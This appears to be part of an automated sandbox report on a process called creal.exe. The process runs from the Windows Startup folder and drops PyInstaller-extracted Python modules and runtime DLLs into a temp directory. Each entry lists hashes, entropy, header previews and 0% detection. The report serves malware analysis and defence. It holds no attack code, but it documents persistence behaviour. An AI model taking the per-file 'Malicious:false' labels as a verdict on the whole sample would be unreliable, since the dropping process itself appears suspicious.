                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):754688
                                                                                                                                                                                                              Entropy (8bit):7.624959985050181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                                                                                              MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                                                                                              SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                                                                                              SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                                                                                              SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27648
                                                                                                                                                                                                              Entropy (8bit):5.792654050660321
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                                                                                              MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                                                                                              SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                                                                                              SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                                                                                              SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed448.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67072
                                                                                                                                                                                                              Entropy (8bit):6.060461288575063
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                                                                                              MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                                                                                              SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
                                                                                                                                                                                                              SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                                                                                              SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_x25519.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                              Entropy (8bit):4.488437566846231
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                                                                                              MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                                                                                              SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                                                                                              SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                                                                                              SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_cpuid_c.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                              Entropy (8bit):4.730605326965181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                              MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                              SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                              SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                              SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_strxor.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                              Entropy (8bit):4.685843290341897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                              MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                              SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                              SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                              SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140_1.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):49528
                                                                                                                                                                                                              Entropy (8bit):6.662491747506177
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                              MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                              SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                              SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                              SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_asyncio.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):71448
                                                                                                                                                                                                              Entropy (8bit):6.244468463173389
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:FRaPPkvNV036Fi9PQ1TUT8TIL11Miu0FIpOn27SyTxq:janCNV064YRUT8TIL11MV0FIpOn2S
                                                                                                                                                                                                              MD5:70FB0B118AC9FD3292DDE530E1D789B8
                                                                                                                                                                                                              SHA1:4ADC8D81E74FC04BCE64BAF4F6147078EEFBAB33
                                                                                                                                                                                                              SHA-256:F8305023F6AD81DDC7124B311E500A58914B05A9B072BF9A6D079EA0F6257793
                                                                                                                                                                                                              SHA-512:1AB72EA9F96C6153B9B5D82B01354381B04B93B7D58C0B54A441B6A748C81CCCD2FC27BB3B10350AB376FF5ADA9D83AF67CCE17E21CCBF25722BAF1F2AEF3C98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.T.S...S...S...+r..S...,...S...,...S...,...S...,...S..$....S..U+...S...S...S..$....S..$....S..$....S..$....S..Rich.S..........PE..d....Are.........." ...%.f................................................... .......#....`.............................................P......d......................../..............T...........................@...@............................................text...!d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_bz2.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84760
                                                                                                                                                                                                              Entropy (8bit):6.58578024183428
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ES7z7Sj2u5ia5ifC83zYLzbCK8CkotIpCVF7SyTUxIS:/7z+jw3MzCNCkotIpCVF+
                                                                                                                                                                                                              MD5:90F58F625A6655F80C35532A087A0319
                                                                                                                                                                                                              SHA1:D4A7834201BD796DC786B0EB923F8EC5D60F719B
                                                                                                                                                                                                              SHA-256:BD8621FCC901FA1DE3961D93184F61EA71068C436794AF2A4449738CCF949946
                                                                                                                                                                                                              SHA-512:B5BB1ECC195700AD7BEA5B025503EDD3770B1F845F9BEEE4B067235C4E63496D6E0B19BDD2A42A1B6591D1131A2DC9F627B2AE8036E294300BB6983ECD644DC8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R...S..R.....R...W..R...V..R...Q..R...S..R..S..R..S..R..._..R...R..R......R...P..R.Rich.R.........................PE..d....Are.........." ...%.....^......|........................................P............`.............................................H............0....... ..,......../...@..........T...........................p...@............................................text...k........................... ..`.rdata..p>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_cffi_backend.cp312-win_amd64.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):182784
                                                                                                                                                                                                              Entropy (8bit):6.193615170968096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
                                                                                                                                                                                                              MD5:0572B13646141D0B1A5718E35549577C
                                                                                                                                                                                                              SHA1:EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
                                                                                                                                                                                                              SHA-256:D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
                                                                                                                                                                                                              SHA-512:67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.C.I.C.I.C.1MC.I.C.<.B.I.C.&#C.I.C.<.B.I.C.<.B.I.C.<.B.I.C.1.B.I.C.4.B.I.C.I.C I.C.<.B.I.C.1KC.I.C.<.B.I.C.<!C.I.C.<.B.I.CRich.I.C................PE..d...g..e.........." .........@......`........................................@............`..........................................w..l....w....... ..........l............0.......]...............................]..8............................................text............................... ..`.rdata..............................@..@.data...h].......0...|..............@....pdata..l...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_ctypes.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):125208
                                                                                                                                                                                                              Entropy (8bit):6.126925801052556
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:PGTMA4TPG40srrYLGNyf/ECZGKgyWLRECBIpLPIuE:Otgp0swLvf/EKCkE
                                                                                                                                                                                                              MD5:452305C8C5FDA12F082834C3120DB10A
                                                                                                                                                                                                              SHA1:9BAB7B3FD85B3C0F2BEDC3C5ADB68B2579DAA6E7
                                                                                                                                                                                                              SHA-256:543CE9D6DC3693362271A2C6E7D7FC07AD75327E0B0322301DD29886467B0B0E
                                                                                                                                                                                                              SHA-512:3D52AFDBC8DA74262475ABC8F81415A0C368BE70DBF5B2BD87C9C29CA3D14C44770A5B8B2E7C082F3ECE0FD2BA1F98348A04B106A48D479FA6BD062712BE8F7C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......x...<...<...<...5.*.:...)...>...)...0...)...4...)...8.......>...w...=...w...:.......?...<..........:.......=.....F.=.......=...Rich<...........................PE..d....Are.........." ...%............`_....................................................`.........................................``.......`.........................../......p.......T...............................@............................................text............................... ..`.rdata..Xl.......n..................@..@.data....4.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_decimal.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):253208
                                                                                                                                                                                                              Entropy (8bit):6.560002521238215
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:kgd/2mZLgPFIY9qWM53pLW1AepppzoeteKU:JZLgPykeKU
                                                                                                                                                                                                              MD5:F78F9855D2A7CA940B6BE51D68B80BF2
                                                                                                                                                                                                              SHA1:FD8AF3DBD7B0EA3DE2274517C74186CB7CD81A05
                                                                                                                                                                                                              SHA-256:D4AE192BBD4627FC9487A2C1CD9869D1B461C20CFD338194E87F5CF882BBED12
                                                                                                                                                                                                              SHA-512:6B68C434A6F8C436D890D3C1229D332BD878E5777C421799F84D79679E998B95D2D4A013B09F50C5DE4C6A85FCCEB796F3C486E36A10CBAC509A0DA8D8102B18
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mBP\.,.\.,.\.,.Ut..R.,.Is-.^.,.Is).Q.,.Is(.T.,.Is/.X.,.f.-._.,..t-.^.,.\.-...,.f./.].,.f.!.S.,.f.,.].,.f...].,.f...].,.Rich\.,.........PE..d....Are.........." ...%.v...<......L....................................................`..........................................T..P...@U..................x'......./......P.......T...........................`...@............................................text...-t.......v.................. ..`.rdata..D............z..............@..@.data....*...p...$...R..............@....pdata..x'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_hashlib.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65816
                                                                                                                                                                                                              Entropy (8bit):6.242721496157571
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uElYij3wzR1lBafLEmIRhFIpOIi7SyHqxn:zYdBaTEmghFIpOIiu
                                                                                                                                                                                                              MD5:8BAEB2BD6E52BA38F445EF71EF43A6B8
                                                                                                                                                                                                              SHA1:4132F9CD06343EF8B5B60DC8A62BE049AA3270C2
                                                                                                                                                                                                              SHA-256:6C50C9801A5CAF0BB52B384F9A0D5A4AA182CA835F293A39E8999CF6EDF2F087
                                                                                                                                                                                                              SHA-512:804A4E19EA622646CEA9E0F8C1E284B7F2D02F3620199FA6930DBDADC654FA137C1E12757F87C3A1A71CEFF9244AA2F598EE70D345469CA32A0400563FE3AA65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Aj...j...j...c.C.n.......h.......f.......b.......i...Pa..h...!...h.......i...j.......Pa..k...Pa..k...Pa/.k...Pa..k...Richj...........................PE..d....Are.........." ...%.T..........P@..............................................oE....`.............................................P.............................../......X...@}..T............................|..@............p..(............................text....S.......T.................. ..`.rdata..&O...p...P...X..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\_lzma.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159512
                                                                                                                                                                                                              Entropy (8bit):6.8453439550985475
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:kEVLLSVeexIDteznfV9mNoNMuX4mZp7zuNtIpZ1uV:kEVHbeye9YON1buNN
                                                                                                                                                                                                              MD5:CF8DE1137F36141AFD9FF7C52A3264EE
                                                                                                                                                                                                              SHA1:AFDE95A1D7A545D913387624EF48C60F23CF4A3F
                                                                                                                                                                                                              SHA-256:22D10E2D6AD3E3ED3C49EB79AB69A81AAA9D16AECA7F948DA2FE80877F106C16
                                                                                                                                                                                                              SHA-512:821985FF5BC421BD16B2FA5F77F1F4BF8472D0D1564BC5768E4DBE866EC52865A98356BB3EF23A380058ACD0A25CD5A40A1E0DAE479F15863E48C4482C89A03F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
